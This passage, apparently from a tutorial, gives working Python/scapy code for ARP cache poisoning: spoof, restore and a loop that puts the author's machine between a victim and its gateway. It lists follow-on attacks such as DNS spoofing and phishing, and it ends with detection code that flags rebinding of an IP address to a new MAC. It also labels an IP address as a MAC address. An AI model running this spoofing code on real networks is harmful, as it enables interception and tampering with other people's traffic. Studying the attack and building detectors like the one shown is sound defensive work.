```python
def spoof(target_ip, host_ip, verbose=True):
    """
    Spoofs `target_ip` saying that we are `host_ip`.
    It is accomplished by changing the ARP cache of the target (poisoning).
    """
    # get the MAC address of the target
    target_mac = get_mac(target_ip)
    # craft the ARP 'is-at' operation packet, in other words, an ARP response
    # we don't specify 'hwsrc' (source MAC address)
    # because by default, 'hwsrc' is the real MAC address of the sender (ours)
    arp_response = ARP(pdst=target_ip, hwdst=target_mac, psrc=host_ip, op='is-at')
    # send the packet
    # verbose=0 means that we send the packet without printing anything
    send(arp_response, verbose=0)
    if verbose:
        # get the MAC address of the default interface we are using
        self_mac = ARP().hwsrc
        print("[+] Sent to {} : {} is-at {}".format(target_ip, host_ip, self_mac))
```

The code above gets the target's MAC address, crafts the malicious ARP reply (response) packet, and then sends it.
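Once we want to stop the attack, we need to re-assign the real addresses to the target device (and to the gateway). If we don't, the victim will lose internet connectivity and will notice that something is wrong. The usual approach is to send seven legitimate ARP reply packets in succession; the code is as follows: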
```python
def restore(target_ip, host_ip, verbose=True):
    """
    Restores the normal process of a regular network.
    This is done by sending the original information
    (real IP and MAC of `host_ip`) to `target_ip`.
    """
    # get the real MAC address of the target
    target_mac = get_mac(target_ip)
    # get the real MAC address of the spoofed host (gateway, i.e. router)
    host_mac = get_mac(host_ip)
    # craft the restoring packet as an ARP reply ('is-at'),
    # matching the legitimate replies described in the text
    arp_response = ARP(pdst=target_ip, hwdst=target_mac, psrc=host_ip, hwsrc=host_mac, op='is-at')
    # send the restoring packet
    # to restore the network to its normal process
    # we send each reply seven times for good measure (count=7)
    send(arp_response, verbose=0, count=7)
    if verbose:
        print("[+] Sent to {} : {} is-at {}".format(target_ip, host_ip, host_mac))
```

Now we need to write the main code, which spoofs the victim host until CTRL + C is pressed; the code is as follows:
```python
if __name__ == "__main__":
    # victim IP address
    target = "192.168.1.100"
    # gateway IP address
    host = "192.168.1.1"
    # print progress to the screen
    verbose = True
    # enable IP forwarding
    enable_ip_route()
    try:
        while True:
            # telling the `target` that we are the `host`
            spoof(target, host, verbose)
            # telling the `host` that we are the `target`
            spoof(host, target, verbose)
            # sleep for one second
            time.sleep(1)
    except KeyboardInterrupt:
        print("[!] Detected CTRL+C ! restoring the network, please wait...")
        restore(target, host)
        restore(host, target)
```

I ran the script on a Linux machine; here is a screenshot of my results:

[Article illustration]
In this example, I used my personal computer as the victim. If you check its ARP cache:

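[Article illustration]
You will see that the attacker's MAC address (in this case "192.168.1.105") is the same as the gateway's; the spoofing succeeded.
On the attacker's machine, when you press CTRL + C to close the program, here is a screenshot of the restore process: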

[Article illustration]
Back on the victim machine, you will see that the gateway's original MAC address has been restored:

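[Article illustration]
▊ How to Respond to the Attack
Once the attack succeeds, the attacker can do many more things. For example, you can inject JavaScript code into HTML responses, DNS-spoof the target, intercept files and modify them on the fly, sniff and monitor the network, run phishing, and so on.
So how do you stop ARP attacks?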
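On the detection side of that question, the following is an added example, not code from the original article: it parses raw Ethernet/ARP frames and flags any 'is-at' reply that rebinds an already-known IP address to a different MAC, which is the trace the `spoof()` loop above leaves on the wire. The function names, the MAC addresses and the optional `trusted` table (the equivalent of static ARP entries) are assumptions, and the sample frames are constructed.

```python
import socket
import struct

ARP_REPLY = 2  # opcode of an 'is-at' reply
GW_MAC, VICTIM_MAC, ATTACKER_MAC = "02:00:00:00:00:01", "02:00:00:00:00:64", "02:00:00:00:00:69"

def build_reply(sender_mac, sender_ip, target_mac, target_ip):
    """Build the bytes of an Ethernet+ARP reply; only used to construct sample input."""
    raw = lambda m: bytes.fromhex(m.replace(":", ""))
    eth = raw(target_mac) + raw(sender_mac) + b"\x08\x06"
    arp = struct.pack("!HHBBH", 1, 0x0800, 6, 4, ARP_REPLY)
    sender = raw(sender_mac) + socket.inet_aton(sender_ip)
    return eth + arp + sender + raw(target_mac) + socket.inet_aton(target_ip)

def parse_arp(frame):
    """Return (opcode, sender_mac, sender_ip), or None if not Ethernet/IPv4 ARP."""
    if len(frame) < 42 or frame[12:14] != b"\x08\x06":
        return None
    htype, ptype, hlen, plen, op = struct.unpack("!HHBBH", frame[14:22])
    if (htype, ptype, hlen, plen) != (1, 0x0800, 6, 4):
        return None
    sender_mac = ":".join("{:02x}".format(b) for b in frame[22:28])
    return op, sender_mac, socket.inet_ntoa(frame[28:32])

def detect(frames, trusted=None):
    """Return (ip, known_mac, claimed_mac) for replies that rebind a known IP."""
    bindings = dict(trusted or {})  # ip -> first MAC seen, or a pinned entry
    alerts = []
    for frame in frames:
        parsed = parse_arp(frame)
        if parsed is None or parsed[0] != ARP_REPLY:
            continue
        _, mac, ip = parsed
        known = bindings.setdefault(ip, mac)  # learn on first sight, never overwrite
        if known != mac and (ip, known, mac) not in alerts:
            alerts.append((ip, known, mac))
    return alerts

# Constructed capture (made-up MACs): honest replies, both poisoning directions, a restore
SAMPLE = [
    build_reply(GW_MAC, "192.168.1.1", VICTIM_MAC, "192.168.1.100"),
    build_reply(VICTIM_MAC, "192.168.1.100", GW_MAC, "192.168.1.1"),
    build_reply(ATTACKER_MAC, "192.168.1.1", VICTIM_MAC, "192.168.1.100"),
    build_reply(ATTACKER_MAC, "192.168.1.100", GW_MAC, "192.168.1.1"),
    build_reply(ATTACKER_MAC, "192.168.1.1", VICTIM_MAC, "192.168.1.100"),
    build_reply(GW_MAC, "192.168.1.1", VICTIM_MAC, "192.168.1.100"),
]

if __name__ == "__main__":
    print(detect(SAMPLE))
```

Learning bindings on first sight only helps when the baseline is captured before any poisoning starts; pinning the gateway through `trusted` removes that dependency.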
